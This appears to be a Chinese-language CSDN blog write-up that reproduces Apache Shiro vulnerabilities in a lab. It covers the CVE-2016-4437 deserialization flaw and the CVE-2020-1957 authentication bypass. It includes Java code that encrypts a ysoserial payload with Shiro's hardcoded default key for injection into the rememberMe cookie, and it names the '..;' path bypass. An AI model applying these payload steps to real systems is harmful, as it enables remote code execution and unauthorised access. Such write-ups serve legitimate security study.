Shiro认证绕过漏洞和反序列化漏洞复现

最新推荐文章于 2024-04-15 23:25:48 发布
最新推荐文章于 2024-04-15 23:25:48 发布
阅读量514 收藏 10
点赞数 12
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54521398/article/details/135233397
版权

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

        shiro550:由于采用硬编码加密,算法可知,导致过程可逆,从而引发反序列化漏洞

        shiro721:硬编码的问题解决了,但是rememberMe字段又出问题了。当用户勾选rememberMeCookie时,系统会将RememberMe cookie字段序列化,进行AES加密,然后进行BASE64编码,那么攻击者就可以按照这个步骤构造payload,从而导致了反序列化漏洞

复现

这是没勾选Remember me的抓包流量

这是勾选后的抓包数据,可以看到有一个rememberme的cookie值,就是这个位置来放置payload

用ysoserial生成一条序列化的命令,然后将其AES加密,BASE64编码

下面是shiro内置的密钥

package org.vulhub.shirodemo;

import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.Base64;
import org.apache.shiro.io.DefaultSerializer;

import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;

public class TestRemember {
    public static void main(String[] args) throws Exception {
        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));

        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));

        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}

payload生成好之后,放到rememberMe的cookie位置把原来的那一串替换掉就好啦

工具方法

        

嗯.....世界的尽头是自动化,太方便了

PS:这个漏洞的存在版本是version<=1.2.4

Apache Shiro 身份验证绕过漏洞 (CVE-2020-1957)

在带有 Spring 动态控制器的 Apache Shiro 1.5.2 之前的版本中,攻击者可以构造恶意制作的请求,用于..;绕过目录身份验证。

尝试访问/admin/,但是重定向到了登陆页面

这个时候只要输入奇妙咒语,神奇的事情发生了,越权进入到主页了

PS:还有一个绕过漏洞,但是是2010年的,是利用/./admin进行绕过的,版本是<=1.0.0

浩子一定能劈叉
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
36-3 shiro越权 - shiro越权漏洞复现
weixin_43263566的博客
04-16 88
我们现在访问网站的admin页面,网站会先对我们当前的用户权限进行验证,没有通过就会跳转到登录页面,让我们的登录一个有对应权限的账号。注意:因为靶场会进行权限验证所以访问会比较慢。IP + 8080 端口访问。正常访问admin的情况。加上payload的情况。
Apache Shiro 认证绕过漏洞(CVE-2020-1957)
Myu_wzy的博客
10-24 1506
使用 Apache Shiro 进行身份验证、权限控制时,可以精心构造恶意的URL,利用Apache Shiro 和 Spring Boot 对URL的处理的差异化,可以绕过Apache Shiro 对 Spring Boot 中的 Servlet的权限控制,越权并实现未授权访问。
Shiro权限绕过漏洞(CVE-2020-1957,CVE-2020-11989、CVE-2020-13933)
weixin_46411728的博客
07-22 1162
Shiro权限绕过漏洞(CVE-2020-1957,CVE-2020-11989、CVE-2020-13933)
Apache Shiro权限绕过漏洞(CVE-2022-32532)
weixin_54438700的博客
12-15 2730
ShiroApache旗下一个开源的Java安全框架,它具有身份验证、访问控制、数据加密、会话管理等功能,可以用于保护任何应用程序的安全,如移动应用程序、web应用程序等。2022年6月29日,Apache官方披露Apache Shiro权限绕过漏洞(CVE-2022-32532),当 Apache Shiro 中使用 RegexRequestMatcher 进行权限配置,且正则表达式中携带“.”时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证
vulfocus——Shiro 身份验证绕过(CVE-2020-13933)
m0_62063669的博客
09-03 1072
Apache Shiro身份验证绕过漏洞CVE-2020-11989的修复补丁存在缺陷,在1.5.3及其之前的版本,由于shiro在处理url时与spring仍然存在差异,依然存在身份校验绕过漏洞由于处理身份验证请求时出错,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。构造特定 PoC 请求指定资源时,不触发身份验证,并绕过权限。(通过特殊payload绕过权限,通过%3b绕过)不知道怎么去找flag,求大佬指教。呜呜呜,对于小白太难了。
CVE-2022-32532:Apache Shiro RegExPatternMatcher 认证绕过复现
Foreverlove112的博客
10-01 1633
CVE-2022-32532:Apache Shiro RegExPatternMatcher 认证绕过复现
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro使用的版本是1.2.4,存在反序列化漏洞,我们采取的办法是手动升级到了1.2.6版本,但苦于无法验证是否解决了问题,后来发现了一款测试工具,ShiroExploit。 测试工具下载地址 ... 反序列化漏洞是如何产生的?...
shiro反序列化脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-14
通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想...
shiro反序列化复现.zip
08-03
shiro反序列化复现工具包;shiro反序列化复现工具包;
追洞计划之渗透测试篇|Shiro认证绕过漏洞总结
SpaceSec的博客
07-22 508
SpaceSec推出追洞计划,帮助各位渗透测试工程师更好地了解漏洞原理,以及复现过程中需要注意的事项。
Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989)
文公子的博客
11-03 3340
Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) Apache Shiro是一个强大且易用的Java安全框架,它可以用来执行身份验证、授权、密码和会话管理。目前常见集成于各种应用中进行身份验证,授权等。 漏洞详情 腾讯安全玄武实验室研究员发现在Apache Shiro 1.5.3之前的版本,将Apache Shiro与Spring控制器一起使用时,特制请求可能会导致身份验证绕过漏洞发现者 该漏洞由腾讯安全玄武实验室的Ruilin发现并报告,此外来自边界无限的淚笑也独立向官方报
shiro权限绕过
m0_67284865的博客
08-21 885
shiro权限绕过原理解析加漏洞复现
Apache-Shiro-认证绕过(CVE-2020-1957)
bqnagus
09-29 438
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造`..;`这样的跳转,可以绕过Shiro中对目录的权限限制。
[详细]Apache Shiro身份验证越权漏洞[CVE-2016-6802][CVE-2020-1957]
qq_60115503的博客
11-07 2575
Apache Shiro是一个强大且易用的java安全框架,执行身份验证,授权,密码和会话管理,使用Shiro的API,可以快速获取任何应用程,从最小的移动应用到最大的网络和企业应用程序。
36-2 shiro越权 - shiro越权介绍
最新发布
weixin_43263566的博客
04-15 117
Apache Shiro 是一个强大且易用的 Java 安全框架,负责执行身份验证、授权、密码和会话管理。无论是最小的移动应用程序还是最大的网络和企业应用程序,都可以通过使用 Shiro 的 API 快速、轻松地实现安全功能。
Shiro 身份验证绕过 (CVE-2020-13933)
qq_44484541的博客
11-01 526
Apache Shiro身份验证绕过漏洞CVE-2020-11989的修复补丁存在缺陷,在1.5.3及其之前的版本,由于shiro在处理url时与spring仍然存在差异,依然存在身份校验绕过漏洞由于处理身份验证请求时出错,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。1.不在请求路由中指定资源名称的时候,不会触发身份验证,也不会有资源返回;3.构造poc请求指定资源,不触发身份验证,并绕过权限(%3b绕过)2.在请求路由中指定资源名称时,302跳转到身份验证页面;
Apache Shiro 越权访问漏洞 CVE-2020-1957 漏洞复现
qq_44484541的博客
11-01 341
CVE-2020-1957,Spring Boot中使用 Apache Shiro 进行身份验证、权限控制时,可以精心构造恶意的URL,利用 Apache Shiro 和 Spring Boot 对URL的处理的差异化,可以绕过 Apache Shiro 对 Spring Boot 中的 Servlet 的权限控制,越权并实现未授权访问。/admin/ , 最终请求 /admin/, 成功访问了后台请求。构造恶意请求url:http://ip:port/xxx/…/admin/,访问到管理页面,越权成功。
shiro反序列化漏洞复现
07-28
Apache Shiro反序列化漏洞是指攻击者可以利用Shiro框架中的反序列化漏洞,通过构造恶意的序列化数据,来执行任意代码或者获取敏感信息的漏洞攻击者可以通过发送恶意请求或者利用其他漏洞来触发该漏洞,从而实现攻击目的。为了防止该漏洞的利用,建议及时更新Shiro框架版本,并加强对系统的安全防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值